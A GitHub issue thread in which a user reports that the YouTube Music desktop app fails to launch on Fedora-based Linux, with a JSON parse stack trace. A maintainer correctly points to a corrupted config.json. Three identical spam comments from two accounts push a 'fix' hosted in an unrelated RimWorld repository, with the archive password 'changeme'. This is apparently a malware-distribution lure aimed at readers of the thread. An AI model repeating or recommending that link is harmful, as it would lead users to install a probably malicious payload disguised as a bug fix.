### ISSUE TITLE
[Bug]:  Fedora Based Linux Distro AppImage and RPM don't work

### ISSUE THREAD

**Issue by deenodadon** [th-ch/youtube-music#2380]
### Preflight Checklist

- [X] I use the latest version of YouTube Music (Application).
- [X] I have searched the [issue tracker](https://github.com/th-ch/youtube-music/issues) for a bug report that matches the one I want to file, without success.
- [X] I understand that **th-ch/youtube-music has NO affiliation with Google or YouTube**

### YouTube Music (Application) Version

3.5.1

### Checklists

- [X] I use the portable version of the YouTube Music Application.
- [ ] I can reproduce this issue in the [official version of (WEB) YTM](https://music.youtube.com).

### What operating system are you using?

Other Linux

### Operating System Version

Operating System: Nobara Linux 40 KDE Plasma Version: 6.1.4 KDE Frameworks Version: 6.5.0 Qt Version: 6.7.2 Kernel Version: 6.10.6-200.fsync.fc40.x86_64 (64-bit) Graphics Platform: X11 

### What CPU architecture are you using?

x64

### Reproduction steps

For App Image: I set the appimage as executable and click on it nothing happens
For Rpm: tried to install it through discover and it said could not open so I installed the application through terminal using sudo dnf install and linked the path to application and installation worked but when I went to open application it seems like it starts trying to open on taskbar and it just disappears  

### Expected Behavior

to open

### Actual Behavior

nothing happens never opens

### Enabled plugins

none

### Additional Information

I ran appimage in terminal and got this A JavaScript error occurred in the main process
Uncaught Exception:
SyntaxError: Unexpected token 'h', ..."kLists": [https://fi"... is not valid JSON
    at JSON.parse (<anonymous>)
    at sje._deserialize (/tmp/.mount_YouTub4EvMV3/resources/app.asar/dist/main/index.js:226:6208)
    at get store (/tmp/.mount_YouTub4EvMV3/resources/app.asar/dist/main/index.js:226:5301)
    at new rje (/tmp/.mount_YouTub4EvMV3/resources/app.asar/dist/main/index.js:226:3389)
    at new sje (/tmp/.mount_YouTub4EvMV3/resources/app.asar/dist/main/index.js:226:9019)
    at Module.<anonymous> (/tmp/.mount_YouTub4EvMV3/resources/app.asar/dist/main/index.js:226:21469)
    at Module._compile (node:internal/modules/cjs/loader:1373:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1432:10)
    at Module.load (node:internal/modules/cjs/loader:1215:32)
    at Module._load (node:internal/modules/cjs/loader:1031:12

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JellyBrick** [comment]
There seems to be something wrong with your configuration (`YTMD-data-dir/config.json`) file.
